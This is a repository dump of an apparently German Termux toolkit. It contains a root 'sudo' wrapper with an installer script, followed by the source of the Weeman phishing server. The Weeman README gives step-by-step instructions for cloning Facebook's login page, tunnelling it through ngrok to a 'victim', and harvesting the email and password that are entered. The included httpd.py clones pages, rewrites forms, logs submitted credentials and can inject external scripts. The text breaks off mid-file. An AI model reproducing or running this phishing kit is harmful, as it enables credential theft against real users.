/data/data/com.termux/files/usr/etc/motd 7 | 8 | exit 9 | -------------------------------------------------------------------------------- /sudo/READ.me: -------------------------------------------------------------------------------- 1 | Ultimate Linux Terminal on Android 2 | #GottModusTermux <--- 3 | 4 | SUPERUSER DO !! aka. SUDO 5 | 6 | follow the next steps for SUDO 7 | >Copy&Paste: 8 | 9 | termux-setup-storage 10 | 11 | apt update && apt upgrade 12 | 13 | apt install git 14 | 15 | pkg install ncurses-utils 16 | 17 | git clone https://github.com/GottModusTermux/G0D.git && cd G0D/sudo 18 | 19 | apt install fish -y && fish 20 | 21 | cat sudo > /data/data/com.termux/files/usr/bin/sudo 22 | 23 | chmod 700 /data/data/com.termux/files/usr/bin/sudo 24 | 25 | exit 26 | 27 | sudo 28 | _________ 29 | 30 | $import "G0D-master.zip" in your Termux 31 | 32 | For example, if the ZIP is in your /0/Download/ folder, 33 | 34 | Copy&Paste the next commands: 35 | 36 | termux-setup-storage 37 | 38 | cd storage/downloads/ 39 | 40 | cp -f G0D-master.zip $HOME 41 | 42 | cd 43 | 44 | pkg install zip 45 | 46 | unzip G0D-master.zip && cd G0D-master/sudo 47 | 48 | apt update && apt upgrade 49 | 50 | pkg install ncurses-utils 51 | 52 | apt install fish && fish 53 | 54 | cat sudo > /data/data/com.termux/files/usr/bin/sudo 55 | 56 | chmod 700 /data/data/com.termux/files/usr/bin/sudo 57 | 58 | exit 59 | 60 | sudo 61 | 62 | ____ 63 | #GottModusTermux 64 | -------------------------------------------------------------------------------- /sudo/sudo: -------------------------------------------------------------------------------- 1 | #!/data/data/com.termux/files/usr/bin/bash 2 | 3 | #set colored=true to turn on colored error messages 4 | #set colored=false to turn off colored error messages 5 | colored=true 6 | 7 | #red=1 green=2 yellow=3 8 | color() { 9 | if [ $colored == "true" ]; then 10 | echo "$(tput setaf $1)${*:2}$(tput sgr0)" 11 | else 12 | echo "${*:2}" 13 | fi 14 | } 15 | 16 | show_usage() { 17 | echo -e "\n`color 3 Usage:`\n" 18 | echo 'sudo su [-]' 19 | echo -e " `color 2 Drop to root shell`\n" 20 | echo 'sudo []' 21 | echo -e " `color 2 Run command as root with optional arguments`\n" 22 | exit 23 | } 24 | 25 | SYSBIN=/system/bin 26 | SYSXBIN=/system/xbin 27 | BB=$SYSXBIN/busybox 28 | PRE=/data/data/com.termux/files 29 | ROOT_HOME=$PRE/home/.suroot 30 | BINPRE=$PRE/usr/bin 31 | LDLP="export LD_LIBRARY_PATH=$PRE/usr/lib" 32 | CMDLINE="PATH=$PATH:$SYSXBIN:$SYSBIN;$LDLP;HOME=$ROOT_HOME;cd $PWD" 33 | 34 | if [ -x /magisk/.core/bin/su ]; then 35 | SU=/magisk/.core/bin/su 36 | elif [ -x /sbin/su ]; then 37 | SU=/sbin/su 38 | elif [ -x $SYSXBIN/su ]; then 39 | SU=$SYSXBIN/su 40 | elif [ -x /su/bin/su ]; then 41 | SU=/su/bin/su 42 | else 43 | echo -e "\n`color 1 su` executable not found" 44 | echo -e "`color 1 sudo` requires `color 1 su`\n" 45 | exit 46 | fi 47 | 48 | if [ ! -d $ROOT_HOME ]; then 49 | if [ -x $BB ] && [ $($BB --list | grep -w mount) == "mount" ]; then 50 | MOUNTEX="$BB mount" 51 | elif [ -x $SYSBIN/mount ]; then 52 | MOUNTEX="$SYSBIN/mount" 53 | else 54 | echo -e "\nCannot find `color 1 mount` executable" 55 | echo -e "`color 2 Unable to setup sudo`\n" 56 | exit 57 | fi 58 | MOUNT_RW="$MOUNTEX -o rw,remount,rw /system" 59 | MOUNT_RO="$MOUNTEX -o ro,remount,ro /system" 60 | if [ -x "/sbin/magisk" ]; then 61 | unset LD_LIBRARY_PATH 62 | $SU -c "$CMDLINE;$MOUNT_RW" 63 | $SU -c "$CMDLINE;mkdir $ROOT_HOME" 64 | $SU -c "$CMDLINE;chmod 700 $ROOT_HOME" 65 | BASHRC="'PS1=\"# \"\nexport TERM=$TERM\n$LDLP\nexport PATH=$PATH:$SYSXBIN:$SYSBIN'" 66 | $SU -c "$CMDLINE;echo -e $BASHRC > $ROOT_HOME/.bashrc" 67 | $SU -c "$CMDLINE;chmod 700 $ROOT_HOME/.bashrc" 68 | $SU -c "$CMDLINE;$MOUNT_RO" 69 | else 70 | $SU -c "$MOUNT_RW" 71 | $SU -c "mkdir $ROOT_HOME" 72 | $SU -c "chmod 700 $ROOT_HOME" 73 | BASHRC="'PS1=\"# \"\nexport TERM=$TERM\n$LDLP\nexport PATH=$PATH:$SYSXBIN:$SYSBIN'" 74 | $SU -c "echo -e $BASHRC > $ROOT_HOME/.bashrc" 75 | $SU -c "chmod 700 $ROOT_HOME/.bashrc" 76 | $SU -c "$MOUNT_RO" 77 | fi 78 | fi 79 | 80 | ARGS=$(printf '%q ' "$@") 81 | 82 | if [ -z "$*" ]; then 83 | show_usage 84 | elif [ $1 == "su" ]; then 85 | CMDLINE="$CMDLINE;$BINPRE/bash" 86 | elif [ -x "$BINPRE/$1" ]; then 87 | CMDLINE="$CMDLINE;$BINPRE/$ARGS" 88 | elif [ -x $SYSBIN/$1 ] || [ -x $SYSXBIN/$1 ] || [ -x $1 ]; then 89 | CMDLINE="$CMDLINE;$ARGS" 90 | else 91 | echo -e "\nCommand `color 1 $1` not found" 92 | echo -e "`color 2 Check your spelling and try again`\n" 93 | fi 94 | 95 | pre_env_chk=`$SU --help|grep -e --preserve-environment` 96 | 97 | if [ -x "/sbin/magisk" ]; then 98 | unset LD_LIBRARY_PATH 99 | fi 100 | 101 | if [ -n "$pre_env_chk" ]; then 102 | $SU --preserve-environment -c "$CMDLINE" 103 | else 104 | $SU -c "$CMDLINE" 105 | fi 106 | 107 | # Reset echo 108 | stty sane -------------------------------------------------------------------------------- /sudogottmodus.sh: -------------------------------------------------------------------------------- 1 | #!/data/data/com.termux/files/usr/bin/bash -e 2 | 3 | # colors 4 | 5 | red='\033[1;31m' 6 | yellow='\033[1;33m' 7 | blue='\033[1;34m' 8 | reset='\033[0m' 9 | 10 | apt-get upgrade -y 11 | apt-get update 12 | printf "$red" 13 | echo "Du musst gleich.." 14 | echo "auf >Zulassen< klicken !!" 15 | printf "$reset" 16 | 17 | sleep 3 18 | 19 | termux-setup-storage 20 | 21 | sleep 5 22 | 23 | printf "$yellow" 24 | echo "sudo wird installiert" 25 | sleep 2 26 | echo "lehnt euch zurück.." 27 | sleep 2 28 | echo "GottModusTermux macht das schon" 29 | echo ".. keine sorge ;D" 30 | sleep 2 31 | 32 | echo 33 | echo "Jetzt gehts los.." 34 | sleep 3 35 | echo "in 3.." 36 | sleep 3 37 | echo "2.." 38 | sleep 2 39 | echo "1.." 40 | sleep 2 41 | printf "$reset" 42 | 43 | apt install git -y 44 | pkg install ncurses-utils 45 | pkg install nano -y 46 | 47 | git clone https://github.com/GottModusTermux/G0D.git 48 | 49 | cd G0D 50 | cd sudo 51 | ls 52 | 53 | sleep 4 54 | 55 | cat sudo > /data/data/com.termux/files/usr/bin/sudo 56 | 57 | chmod 700 /data/data/com.termux/files/usr/bin/sudo 58 | 59 | cd $HOME 60 | 61 | 62 | printf "$blue" 63 | echo "so das wars ja schon" 64 | sleep 2 65 | echo "sudo ist nun einsatz bereit !!" 66 | sleep 2 67 | echo "als letztes testen wir noch sudo" 68 | printf "$reset" 69 | echo 70 | printf "$red" 71 | echo 72 | echo "DU MUSST" 73 | echo "TERMUX" 74 | echo "ROOT-RECHTE" 75 | echo "GEBEN !!" 76 | printf "$reset" 77 | 78 | sleep 5 79 | 80 | sudo 81 | 82 | sleep 7 83 | 84 | echo "alles gut ? okaay das wars ;D" 85 | 86 | sleep 2 87 | 88 | printf "$red" 89 | echo "und jetzt bin ich auch schon weg.." 90 | sleep 2 91 | echo "besucht meine github seite !" 92 | sleep 2 93 | echo "github.com/GottModusTermux/G0D" 94 | printf "$reset" 95 | sleep 3 96 | printf "$blue" 97 | echo "github.com/GottModusTermux/G0D" 98 | printf "$reset" 99 | sleep 3 100 | printf "$red" 101 | echo "github.com/GottModusTermux/G0D" 102 | printf "$reset" 103 | sleep 2 104 | 105 | exit 106 | 107 | 108 | 109 | -------------------------------------------------------------------------------- /weeman/.gitignore: -------------------------------------------------------------------------------- 1 | *.pyc 2 | history.log 3 | -------------------------------------------------------------------------------- /weeman/ChangeLog: -------------------------------------------------------------------------------- 1 | * Version 1.0 <10-09-2015>: 2 | Initial release. 3 | 4 | * Version 1.1 (Wein) <12-09-2015>: 5 | Added redirect to orignal site. 6 | Bug fixes 7 | 8 | * Version 1.2.2 (Popi) <16-09-2015>: 9 | Screenshot updated. 10 | Files moved from one script to core/. 11 | Bug fixes 12 | ASCII logo replaced. 13 | 14 | Version 1.3 (ArmWork) <26-09-2015>: 15 | Added restore from session. 16 | Bug fixes 17 | 18 | Version 1.4 (Ping) <05-10-2015>: 19 | Added quiet_mode. 20 | Bug (#4) fixes. 21 | Added root check for port 80. 22 | Added html_file option. 23 | using optparse 24 | Replacing files/images/scripts with full locations. 25 | Headers files updated. 26 | 27 | Version 1.5 (GreenTree) 10-10-2015: 28 | url, action_url http://localhost changed to None 29 | Beautifulsoup dependency removed. 30 | 31 | Version 1.6 (Black-eagle) 22-11-2015: 32 | Added command line options. 33 | Added framework.py 34 | Added modules/is_website_up.pu module. 35 | Code cleanup. 36 | Windows not supported! 37 | 38 | Version 1.7 (Scratch) 25-03-2016: 39 | Added profiles 40 | Added module whois_ip.py 41 | Added module extract_links.py 42 | Added new tool tools/switch_ip_forward.sh 43 | Tool Removed tools/weeman_ettercap.sh 44 | Core updated. 45 | Bug fixes. 46 | 47 | Version 1.7.1 (Final): 48 | Framework removed. 49 | bs4 updated. 50 | this is the last version of weeman. 51 | -------------------------------------------------------------------------------- /weeman/README.md: -------------------------------------------------------------------------------- 1 | # Weeman - http server for phishing 2 | 3 | # Zuerst "ngrok" 4 | 5 | SCHRITT FÜR SCHRITT "WEEMAN" IN TERMUX INSTALLIEREN :- 6 | Teilen Sie Ihre Links über das Internet und schappen Sie sich die Login-daten 7 | --> installieren NGROK im vorraus 8 | 9 | -gehe per Browser auf https://ngrok.com/download und lade die "Linux ARM" Zip 10 | 11 | -in Termux nutzen wir jetzt folgende Befehle: 12 | 13 | 1. > cd /sdcard/download 14 | 2. > unzip ngrok.zip 15 | 3. > cp ngrok $HOME 16 | 4. > cd $HOME 17 | 5. > ls 18 | 6. > chmod 777 ngrok 19 | 7. > ./ngrok 20 | 8. > ./ngrok authtoken 844ZM.... [kopiere den Orginal Code der dir angezeigt wird, sobald du dich eingelogt hast] 21 | 22 | zu 8.: ohne Authentifizierungs-Token läuft der Server bei NGROK max. 8h !! 23 | meldest Sie sich auf https://ngrok.com/ an und loggen Sie sich ein, 24 | um den Authentifizierungs-Token zu erhalten 25 | den Sie einfach in Termux einfügen 26 | 27 | # Installieren 28 | 29 | TIPPE 30 | 31 | 32 | > apt update && apt upgrade 33 | 34 | dann TIPPE 35 | 36 | 37 | > pkg install git 38 | 39 | kopieren den folgenden Link 40 | 41 | 42 | > git clone https://github.com/GottModusTermux/G0D 43 | 44 | > ls 45 | 46 | > cd G0D/weeman 47 | 48 | > pkg install python2 49 | 50 | > ls 51 | 52 | > python2 weeman.py 53 | 54 | # Ausführen 55 | 56 | nach dem Start folgende befehle 57 | 58 | -Befehl 1 59 | 60 | > set url yoursite.com 61 | 62 | -Befehl 2 63 | 64 | > set port 8080 65 | 66 | -Befehl 3 67 | 68 | > set action_url yoursite.com 69 | 70 | -Befehl 4 71 | 72 | > run 73 | 74 | Nun öffnet ihr einen Browser und sucht 75 | LOCALHOST:8080 oder 127.0.0.1:8080. 76 | 77 | # ERÖFFNE EINE FACEBOOK-PHISHING SEITE. 78 | 79 | -TIPPE: 80 | 81 | > cd G0D/weeman 82 | 83 | > python2 weeman.py 84 | 85 | > set url https://www.facebook.com/ 86 | 87 | > set port 8080 88 | 89 | > set action_url https://www.facebook.com/ 90 | 91 | > run 92 | 93 | Jetzt können Sie Ihre Facebook-Phishing Seite einfach per Ngrok an Ihr Opfer weiterleiten... 94 | 95 | -Neues Termux Fenster öffnen 96 | 97 | -gehe zum Ordner wo NGROK vorhanden ist 98 | (hier im ordner G0D.... ) 99 | > cd G0D 100 | 101 | > ./ngrok http 8080 102 | 103 | Oben rechts den unteren Link kopieren, und nun verschicken 104 | Beispiel: 105 | "https://denLinkKopieren.ngrok.io -> localhost:8080 106 | 107 | sobald das Opfer seine Login-Daten eingegeben hat, 108 | können Sie seine E-Mail-ID und sein Passwort in dem Termux Fenster "weeman" einsehen 109 | (hochscrollen und "user: " | "pass: "suchen) 110 | 111 | sobald "ngrok" beendet wird, ist der erstellte Link nicht mehr erreichbar !! 112 | 113 | 114 | HTTP server for phishing in python. 115 | Version 1.7.1 is the last and latest version for weeman. 116 | -------------------------------------------------------------------------------- /weeman/contributors.txt: -------------------------------------------------------------------------------- 1 | Weeman contributors 2 | -------------------- 3 | 4 | Thanks to these nice people: 5 | ---------------------------- 6 | 7 | DeveloppSoft (developpsoft.github.io) - Fixed english mistake and list cmd in framework 8 | Bugzap91 - for the link patch. 9 | Adrien Kuhn () - for adding Fedora instructions #3. 10 | lisogallo - 'external_js' option for including external scripts 11 | 12 | -------------------------------------------------------------------------------- /weeman/core/__init__.py: -------------------------------------------------------------------------------- 1 | # 2 | # __init__.py - just pass 3 | # 4 | 5 | pass 6 | -------------------------------------------------------------------------------- /weeman/core/complete.py: -------------------------------------------------------------------------------- 1 | # 2 | # complete.py - auto complete with readline 3 | # 4 | # Credit to (http://stackoverflow.com/a/187660) 5 | # 6 | # This file if part of weeman project 7 | # 8 | # See 'LICENSE' file for copying 9 | # 10 | 11 | import readline 12 | 13 | array = ["set", "show", 14 | "help", "port", 15 | "url", "action_url", 16 | "user_agent", "html_file", 17 | "external_js", "clear", 18 | "quit", 19 | "run", "banner"] 20 | 21 | class auto(object): 22 | 23 | def __init__(self, options): 24 | self.options = sorted(options) 25 | 26 | def complete(self, text, state): 27 | if state == 0: 28 | if text: 29 | self.matches = [s for s in self.options 30 | if s and s.startswith(text)] 31 | else: 32 | self.matches = self.options[:] 33 | try: 34 | return self.matches[state] 35 | except IndexError: 36 | return None 37 | 38 | def complete(array): 39 | completer = auto(array) 40 | readline.set_completer(completer.complete) 41 | readline.parse_and_bind('tab:complete') 42 | -------------------------------------------------------------------------------- /weeman/core/config.py: -------------------------------------------------------------------------------- 1 | # 2 | # config.py - config variables 3 | # 4 | # This file if part of weeman project 5 | # 6 | # See 'LICENSE' file for copying 7 | # 8 | 9 | 10 | import os 11 | import sys 12 | 13 | __author__ = "Hypsurus " 14 | __version__ = "1.7.1" 15 | __codename__ = "end" 16 | 17 | say = "There are plenty of fish in the sea" 18 | 19 | def history_getkey(key): 20 | try: 21 | history = open("history.log", "r").readlines() 22 | except Exception as e: 23 | return 0 24 | if history == None: 25 | return 0 26 | for line in history: 27 | if line.startswith("\n") or line.startswith("#"): 28 | pass 29 | (skey,value) = line.split(" = ") 30 | if skey == key: 31 | return str(value[:-1]) 32 | return 0 33 | 34 | url = history_getkey("url") or None 35 | port = int(history_getkey("port")) or int(8080) 36 | action_url = history_getkey("action_url") or None 37 | user_agent = history_getkey("user_agent") or "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36" 38 | html_file = None 39 | external_js = history_getkey("external_js") or None 40 | quiet_mode = False 41 | -------------------------------------------------------------------------------- /weeman/core/httpd.py: -------------------------------------------------------------------------------- 1 | # 2 | # httpd.py - the main httpd server 3 | # 4 | # This file if part of weeman project 5 | # 6 | # See 'LICENSE' file for copying 7 | # 8 | 9 | import SimpleHTTPServer 10 | import SocketServer 11 | import urllib2 12 | import cgi 13 | import os 14 | import time 15 | from socket import error as socerr 16 | from core.config import __version__ 17 | from core.config import __codename__ 18 | from core.misc import printt 19 | from lib.bs4 import BeautifulSoup as bs 20 | 21 | class handler(SimpleHTTPServer.SimpleHTTPRequestHandler): 22 | ## Set server version 23 | server_version = "Weeman %s (%s)" %(__version__, __codename__) 24 | """ 25 | Log message handler for simple HTTP server. 26 | """ 27 | def do_POST(self): 28 | post_request = [] 29 | printt(3, "%s - sent POST request." %self.address_string()) 30 | form = cgi.FieldStorage(self.rfile, 31 | headers=self.headers, 32 | environ={'REQUEST_METHOD':'POST', 33 | 'CONTENT_TYPE':self.headers['Content-Type'],}) 34 | try: 35 | 36 | from core.shell import url 37 | 38 | logger = open("%s.log" %url.replace("https://", "").replace("http://", "").split("/")[0], "a") 39 | logger.write("\n## %s - Data for %s\n\n" %(time.strftime("%H:%M:%S - %d/%m/%y"), url)) 40 | 41 | for tag in form.list: 42 | tmp = str(tag).split("(")[1] 43 | key,value = tmp.replace(")", "").replace("\'", "").replace(",", "").split() 44 | post_request.append("%s %s" %(key,value)) 45 | printt(2, "%s => %s" %(key,value)) 46 | logger.write("%s => %s\n" %(key,value)) 47 | logger.close() 48 | 49 | from core.shell import action_url 50 | 51 | create_post(url,action_url, post_request) 52 | SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self) 53 | 54 | except socerr as e: 55 | printt(3, "%s igonring ..." %str(e)) 56 | except Exception as e: 57 | printt(3, "%s igonring ..." %str(e)) 58 | 59 | def log_message(self, format, *args): 60 | 61 | arg = format%args 62 | if arg.split()[1] == "/": 63 | printt(3, "%s - sent GET request without parameters." %self.address_string()) 64 | else: 65 | if arg.split()[1].startswith("/") and "&" in arg.split()[1]: 66 | printt(3, "%s - sent GET request with parameters." %self.address_string()) 67 | printt(2, "%s" %arg.split()[1]) 68 | 69 | class weeman(object): 70 | """ 71 | weeman Object 72 | """ 73 | def __init__(self, url,port): 74 | 75 | from core.shell import url 76 | from core.shell import port 77 | 78 | self.port = port 79 | self.httpd = None 80 | self.url = url 81 | self.form_url = None; 82 | 83 | def request(self,url): 84 | """ 85 | Send request to the http server. 86 | """ 87 | 88 | from core.shell import user_agent 89 | 90 | opener = urllib2.build_opener() 91 | opener.addheaders = [('User-Agent', user_agent), 92 | ("Accept", "text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1"), 93 | #("Accept-Language","en-US,en;q=0.9,en;q=0.8"), 94 | #("Accept-Encoding", "gzip;q=0,deflate,sdch"), 95 | #("Accept-Charset", "ISO-8859-2,utf-8;q=0.7,*;q=0.7"), 96 | ("Keep-Alive", "115"), 97 | ("Connection", "keep-alive"), 98 | ("DNT", "1")] 99 | return opener.open(self.url).read() 100 | 101 | def clone(self): 102 | 103 | from core.shell import html_file 104 | from core.shell import external_js 105 | 106 | if not html_file: 107 | printt(3, "Trying to get %s ..." %self.url) 108 | printt(3, "Downloading webpage ...") 109 | data = self.request(self.url) 110 | else: 111 | printt(3, "Loading \'%s\' ..." %html_file) 112 | data = open(html_file, "r").read() 113 | 114 | data = bs(data, "html.parser") 115 | printt(3, "Modifying the HTML file ...") 116 | 117 | for tag in data.find_all("form"): 118 | tag['method'] = "post" 119 | tag['action'] = "redirect.html" 120 | 121 | # Replace path with full path with the URL 122 | for tag in data.find_all("a"): 123 | pass 124 | 125 | # Insert external script 126 | script = data.new_tag('script', src=external_js) 127 | data.html.head.insert(len(data.html.head), script) 128 | 129 | with open("index.html", "w") as index: 130 | index.write(data.prettify().encode('utf-8')) 131 | index.close() 132 | 133 | def serve(self): 134 | 135 | print("\033[01;35m[i] Starting Weeman %s server on http://localhost:%d\033[00m" %(__version__, self.port)) 136 | self.httpd = SocketServer.TCPServer(("", self.port),handler) 137 | self.httpd.serve_forever() 138 | 139 | def cleanup(self): 140 | 141 | if os.path.exists("index.html"): 142 | printt(3, "\n[i] Running cleanup ...") 143 | os.remove("index.html") 144 | if os.path.exists("redirect.html"): 145 | os.remove("redirect.html") 146 | 147 | def create_post(url,action_url, post_request): 148 | """ 149 | Create the page that will reidrect to the orignal page. 150 | """ 151 | 152 | printt(3, "Creating redirect.html ...") 153 | 154 | with open("redirect.html","w") as r: 155 | r.write("
\n" %action_url) 156 | for post in post_request: 157 | key,value = post.split() 158 | r.write("\n" %(key,value)) 159 | r.write("") 160 | r.write("") 161 | r.close() 162 | -------------------------------------------------------------------------------- /weeman/core/logo.txt: -------------------------------------------------------------------------------- 1 | ____________________GottModusTermux____________________ 2 | ___ ___ ___ ___ ___ ___ 3 | /\__\ /\ \ /\ \ /\__\ /\ \ /\__\ 4 | /:/\__\ /::\ \ /::\ \ /::L_L_ /::\ \ /:| _|_ 5 | /:/:/\__\ /::\:\__\ /::\:\__\ /:/L:\__\ /::\:\__\ /::|/\__\ 6 | \::/:/ / \:\:\/ / \:\:\/ / \/_/:/ / \/\::/ / \/|::/ / 7 | \::/ / \:\/ / \:\/ / /:/ / /:/ / |:/ / 8 | \/__/ \/__/ \/__/ \/__/ \/__/ \/__/ 9 | -------------------------------------------------------------------------------- /weeman/core/misc.py: -------------------------------------------------------------------------------- 1 | # 2 | # misc.py - usefull functions 3 | # 4 | # This file if part of weeman project 5 | # 6 | # See 'LICENSE' file for copying 7 | # 8 | 9 | 10 | import sys 11 | import time 12 | 13 | # help options 14 | help_options = {"url" : "The URL of the webpage, with https:// or http://.", 15 | "action_url" : "The form action URL of the webpage.", 16 | "port" : "The port weeman will listen", 17 | "user_agent" : "Weeman User-Agent string.", 18 | "html_file" : "allows you to load html file instead of URL.", 19 | "external_js" : "allows you to include an external script to be loaded.", 20 | "set" : "Set value for option, set